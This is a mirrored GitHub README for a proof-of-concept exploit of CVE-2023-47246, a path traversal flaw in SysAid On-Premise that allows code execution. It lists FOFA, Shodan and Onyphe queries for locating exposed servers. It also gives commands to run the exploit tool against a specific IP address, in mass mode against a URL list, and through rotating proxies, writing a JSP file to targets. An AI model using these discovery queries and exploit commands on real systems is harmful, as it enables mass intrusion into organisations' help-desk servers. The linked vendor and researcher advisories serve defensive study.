CVE-2023-47246 PoC — Sysaid Technologies SysAid 安全漏洞

Source

https://github.com/tucommenceapousser/CVE-2023-47246

Associated Vulnerability

Title:Sysaid Technologies SysAid 安全漏洞 (CVE-2023-47246)
Description:In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.

Readme

# Vulnerability details

## Clone on replit:
[![Run on Replit](https://replit.com/badge/github/tucommenceapousser/CVE-2023-47246)](https://replit.com/github/tucommenceapousser/CVE-2023-47246)

1. fofa:

   ```text
   body="sysaid-logo-dark-green.png" || title="SysAid Help Desk Software" || body="Help Desk software <a href=\"http://www.sysaid.com\">by SysAid</a>"
   ```

shodan
```
http.favicon.hash:1540720428
```


onyphe.io

[https://www.onyphe.io/search?q=category%3Adatascan+cpe%3A%22cpe%3A%2Fa%3Asysaid%3Ahelp_desk_software%3A-%22&g-recaptcha-response=03AFcWeA4VpQc5UkjerpJN4kqs4NuRTBE29ETcWwuCe_m7z9mois24KksasmCqHjKpxiqSfOFQbQyiE75p4ep5BmmV_E84sYo1qVr0MD5ZI3N4Cl3E12H0Mzg-BQcL7162ubWtvlKd6LxqbWgF9eejffE7iBoGsLsQap-e2STsDz-kIWCxXftSKOaNVpSKCR9HUa7N1xZshO-0LQqKhfggsSWVi7SZI7gXqo016j4Fn-qkJ59MEpBbt3GCGsAuw4pokNe0kbuQeNErxqRPsRau9JaCjqnVhCq7usf_kl9ZR2D5p6Jd16FhezGLI3TNQCruvVd9OYJbI5BYYj49Z_WQ4ZYw0BXZyY8zH1qqCubKf9R8-YeXrEAK7ey3Kr7mTPyuqJvtN0r-umi7jYLYXDQGoXKOCwSXcBBUcwMOWuU2Q5Bs8ICDL3ZekNjeCkPM9ATqD6IKjiztjSm4uaWlgob8RkLArTWUypLAArcxTs3wYTApWofwV8nuC_0KuSM4o-LSwM6fV0VW_kCv8-OzTVx9h5QeobTFMTLXWy3gDOaicaMuvVvFX5Xqsw4CmZR5-2k5VhXKB7izzoar
](https://t.co/oeRLgORoIv)


2. Affected versions: SysAid Server<23.3.36

# Vulnerability recurrence

1. Execute the script:

33 Mode Single
   ```shell
   git clone https://github.com/tucommenceapousser/CVE-2023-47246.git
   cd CVE-2023-47246
   pip install -r requirements.txt
   chmod +x expp
   ./expp -u https://170.82.173.30:443 -f def.jsp
   ```
## Mode Mass
   ```shell
   git clone https://github.com/tucommenceapousser/CVE-2023-47246.git
   cd CVE-2023-47246
   pip install -r requirements.txt
   chmod +x expp
   ./expp -m urls.txt -f def.jsp
   ```

## Mode Proxy-List
   ```shell
   git clone https://github.com/tucommenceapousser/CVE-2023-47246.git
   cd CVE-2023-47246
   pip install -r requirements.txt
   chmod +x exp
   ./exp -m urls.txt --proxy-list proxies.txt -f def.jsp
   ```
2. result:![](https://static-trkn.replit.app/47246.jpg)

# On replit
change the first lign of exp
```
#!venv/bin/python
```
use this command
```
python -m venv venv
```
```
source venv/bin/activate
```
```
chmod +x exp
```
```
exp -m urls.txt -f def.jsp
```

# Reference

https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-47246.yaml  
https://www.huntress.com/blog/critical-vulnerability-sysaid-cve-2023-47246  
https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification  
https://www.zscaler.com/blogs/security-research/coverage-advisory-cve-2023-47246-sysaid-zero-day-vulnerability

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →